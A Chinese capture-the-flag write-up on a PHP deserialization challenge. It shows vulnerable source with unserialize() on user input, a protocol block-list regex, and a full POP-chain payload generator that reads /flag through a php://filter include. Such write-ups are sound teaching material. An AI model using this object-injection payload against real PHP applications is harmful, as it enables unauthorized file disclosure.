考点:反序列化
打开题目发现如下代码
PHP伪协议的考点,需要先去读取useless.php
得到源码
<?php
class Modifier {
protected $var;
public function append($value){
include($value);//flag.php
}
public function __invoke(){
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->str->source;
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function();
}
}
if(isset($_GET['password'])){
@unserialize($_GET['password']);
}
else{
$a=new Show;
}
?>
这个POP链是通过Show类的__toString去触发Test类的__get最后调用Modifier的__invoke去得到flag。
下面开始构造payload
<?php
class Modifier{
protected $var='php://filter/convert.base64-encode/resource=/flag';
}
class Show{
public $source;
public $str;
}
class Test{
public $p;
}
$m=new Modifier();
$s=new Show();
$t=new Test();
$t->p=$m;
$s->str=$t;
$s->source=$s;
echo urlencode(serialize($s));
?>
由于__toString函数也需要触发,所以这里我把Show类又赋值给了Show对象的source变量。
访问得到base64编码的内容。
解码获得flag